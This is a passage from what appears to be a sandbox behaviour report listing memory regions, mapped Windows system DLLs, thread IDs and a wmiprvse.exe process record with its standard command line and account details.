"c:\\windows\\system32\\netutils.dll") Region: id = 1824 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1825 start_va = 0x7ffa122e0000 end_va = 0x7ffa12359fff monitored = 0 entry_point = 0x7ffa12301a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1826 start_va = 0x7ffa123a0000 end_va = 0x7ffa123d3fff monitored = 0 entry_point = 0x7ffa123bae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1827 start_va = 0x7ffa123e0000 end_va = 0x7ffa123e9fff monitored = 0 entry_point = 0x7ffa123e1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1828 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1829 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1830 start_va = 0x7ffa12710000 end_va = 0x7ffa12726fff monitored = 0 entry_point = 0x7ffa127179d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1831 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1832 start_va = 0x7ffa12870000 end_va = 0x7ffa12890fff monitored = 0 entry_point = 0x7ffa12880250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1833 start_va = 0x7ffa128c0000 end_va = 0x7ffa128f9fff monitored = 0 entry_point = 0x7ffa128c8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1834 start_va = 0x7ffa12900000 end_va = 0x7ffa12926fff monitored = 0 entry_point = 0x7ffa12910aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1835 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1836 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1837 start_va = 0x7ffa12c00000 end_va = 0x7ffa12c18fff monitored = 0 entry_point = 0x7ffa12c05e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1838 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1839 start_va = 0x7ffa12c50000 end_va = 0x7ffa12ce8fff monitored = 0 entry_point = 0x7ffa12c7f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1840 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1841 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1842 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1843 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1844 start_va = 0x7ffa12e20000 end_va = 0x7ffa12e74fff monitored = 0 entry_point = 0x7ffa12e37970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1845 start_va = 0x7ffa12e80000 end_va = 0x7ffa12f34fff monitored = 0 entry_point = 0x7ffa12ec22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1846 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1847 start_va = 0x7ffa13110000 end_va = 0x7ffa13126fff monitored = 0 entry_point = 0x7ffa13111390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1848 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1849 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1850 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1851 start_va = 0x7ffa133e0000 end_va = 0x7ffa13465fff monitored = 0 entry_point = 0x7ffa133ed8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1852 start_va = 0x7ffa13520000 end_va = 0x7ffa13b63fff monitored = 0 entry_point = 0x7ffa136e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1853 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1854 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1855 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1856 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1857 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1858 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1859 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1860 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1861 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1862 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1863 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1864 start_va = 0x7ffa14ba0000 end_va = 0x7ffa14bf1fff monitored = 0 entry_point = 0x7ffa14baf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1865 start_va = 0x7ffa14c00000 end_va = 0x7ffa15028fff monitored = 0 entry_point = 0x7ffa14c28740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1866 start_va = 0x7ffa15030000 end_va = 0x7ffa1508bfff monitored = 0 entry_point = 0x7ffa1504b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1867 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1868 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1869 start_va = 0x7ffa15210000 end_va = 0x7ffa1676efff monitored = 0 entry_point = 0x7ffa153711f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1870 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2047 start_va = 0x7a00000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 2049 start_va = 0x440000 end_va = 0x442fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2089 start_va = 0x440000 end_va = 0x444fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2092 start_va = 0x440000 end_va = 0x444fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2174 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 2257 start_va = 0x440000 end_va = 0x441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2258 start_va = 0x450000 end_va = 0x451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2277 start_va = 0xd40000 end_va = 0xd60fff monitored = 0 entry_point = 0xd42300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2278 start_va = 0xd70000 end_va = 0xd82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 2279 start_va = 0xd40000 end_va = 0xd60fff monitored = 0 entry_point = 0xd42300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2280 start_va = 0xd70000 end_va = 0xd82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 2281 start_va = 0xd40000 end_va = 0xd60fff monitored = 0 entry_point = 0xd42300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2282 start_va = 0xd70000 end_va = 0xd82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 2285 start_va = 0x450000 end_va = 0x451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2409 start_va = 0xd40000 end_va = 0xd41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 2411 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2412 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2416 start_va = 0xd50000 end_va = 0xd62fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 2418 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 2419 start_va = 0x7d00000 end_va = 0x7dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 2426 start_va = 0xd50000 end_va = 0xd62fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 2428 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2429 start_va = 0x450000 end_va = 0x453fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2430 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2835 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2837 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2846 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2847 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2862 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2863 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2960 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2961 start_va = 0x440000 end_va = 0x441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2993 start_va = 0x440000 end_va = 0x444fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3005 start_va = 0x7e00000 end_va = 0x7efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 3006 start_va = 0x7f00000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 3007 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 3047 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Thread: id = 67 os_tid = 0x1178 Thread: id = 68 os_tid = 0x1144 Thread: id = 69 os_tid = 0x114c Thread: id = 70 os_tid = 0x1150 Thread: id = 71 os_tid = 0x11f4 Thread: id = 72 os_tid = 0x10e8 Thread: id = 73 os_tid = 0x10e4 Thread: id = 74 os_tid = 0x1060 Thread: id = 75 os_tid = 0x100c Thread: id = 76 os_tid = 0x1008 Thread: id = 77 os_tid = 0xff0 Thread: id = 78 os_tid = 0x6a4 Thread: id = 79 os_tid = 0x6fc Thread: id = 80 os_tid = 0xaa0 Thread: id = 81 os_tid = 0xa5c Thread: id = 82 os_tid = 0x85c Thread: id = 83 os_tid = 0x48c Thread: id = 84 os_tid = 0x8dc Thread: id = 85 os_tid = 0x488 Thread: id = 86 os_tid = 0x440 Thread: id = 87 os_tid = 0x5e4 Thread: id = 88 os_tid = 0x8d0 Thread: id = 89 os_tid = 0xbd0 Thread: id = 90 os_tid = 0x9c4 Thread: id = 91 os_tid = 0x18c Thread: id = 92 os_tid = 0x820 Thread: id = 93 os_tid = 0x6e4 Thread: id = 94 os_tid = 0x72c Thread: id = 95 os_tid = 0x878 Thread: id = 96 os_tid = 0x958 Thread: id = 97 os_tid = 0x830 Thread: id = 98 os_tid = 0xaac Thread: id = 99 os_tid = 0xad0 Thread: id = 100 os_tid = 0xae0 Thread: id = 101 os_tid = 0x89c Thread: id = 102 os_tid = 0xbfc Thread: id = 103 os_tid = 0xb44 Thread: id = 104 os_tid = 0x668 Thread: id = 105 os_tid = 0x5ec Thread: id = 106 os_tid = 0x780 Thread: id = 107 os_tid = 0x5ac Thread: id = 108 os_tid = 0x728 Thread: id = 109 os_tid = 0x5e0 Thread: id = 110 os_tid = 0x508 Thread: id = 111 os_tid = 0x428 Thread: id = 112 os_tid = 0x4f8 Thread: id = 113 os_tid = 0x7e4 Thread: id = 114 os_tid = 0x7e0 Thread: id = 115 os_tid = 0x7dc Thread: id = 116 os_tid = 0x7d8 Thread: id = 117 os_tid = 0x7cc Thread: id = 118 os_tid = 0x7c4 Thread: id = 119 os_tid = 0x7b0 Thread: id = 120 os_tid = 0x788 Thread: id = 121 os_tid = 0x744 Thread: id = 122 os_tid = 0x448 Thread: id = 123 os_tid = 0x6f8 Thread: id = 124 os_tid = 0x6d4 Thread: id = 125 os_tid = 0x648 Thread: id = 126 os_tid = 0x640 Thread: id = 127 os_tid = 0x62c Thread: id = 128 os_tid = 0x534 Thread: id = 129 os_tid = 0x530 Thread: id = 130 os_tid = 0x4a8 Thread: id = 131 os_tid = 0x2ac Thread: id = 132 os_tid = 0x270 Thread: id = 133 os_tid = 0x154 Thread: id = 134 os_tid = 0x1b8 Thread: id = 135 os_tid = 0x1bc Thread: id = 136 os_tid = 0x180 Thread: id = 137 os_tid = 0x188 Thread: id = 138 os_tid = 0x148 Thread: id = 139 os_tid = 0x12c Thread: id = 140 os_tid = 0xfc Thread: id = 141 os_tid = 0x60 Thread: id = 142 os_tid = 0x3f0 Thread: id = 143 os_tid = 0x3e8 Thread: id = 144 os_tid = 0x3cc Thread: id = 145 os_tid = 0x364 Thread: id = 162 os_tid = 0x11ac Thread: id = 166 os_tid = 0x11b4 Thread: id = 168 os_tid = 0xe34 Thread: id = 169 os_tid = 0xb10 Thread: id = 187 os_tid = 0x620 Thread: id = 188 os_tid = 0x1014 Thread: id = 189 os_tid = 0x101c Thread: id = 192 os_tid = 0xb80 Process: id = "6" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x663db000" os_pid = "0x107c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0004d7d4" [0xc000000f] Region: id = 1872 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1873 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1874 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1875 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1876 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1877 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1878 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1879 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1880 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1881 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1882 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1883 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1884 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1885 start_va = 0x480000 end_va = 0x484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1886 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1887 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1888 start_va = 0x5a0000 end_va = 0x8d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1889 start_va = 0x8e0000 end_va = 0xa67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1890 start_va = 0xa70000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 1891 start_va = 0xc00000 end_va = 0xcbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 1892 start_va = 0xcc0000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1893 start_va = 0xd40000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 1894 start_va = 0xe40000 end_va = 0xe40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 1895 start_va = 0xe50000 end_va = 0xe50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 1896 start_va = 0xe60000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 1897 start_va = 0xee0000 end_va = 0xf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 1898 start_va = 0xf60000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 1899 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1900 start_va = 0x1060000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 1901 start_va = 0x10e0000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 1902 start_va = 0x1170000 end_va = 0x1172fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 1903 start_va = 0x1190000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 1904 start_va = 0x12a0000 end_va = 0x12a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 1905 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1906 start_va = 0x180000000 end_va = 0x180002fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 1907 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1908 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1909 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1910 start_va = 0x7ff7aedf0000 end_va = 0x7ff7aee6ffff monitored = 0 entry_point = 0x7ff7aee05f50 region_type = mapped_file name = "wmiprvse.exe" filename = 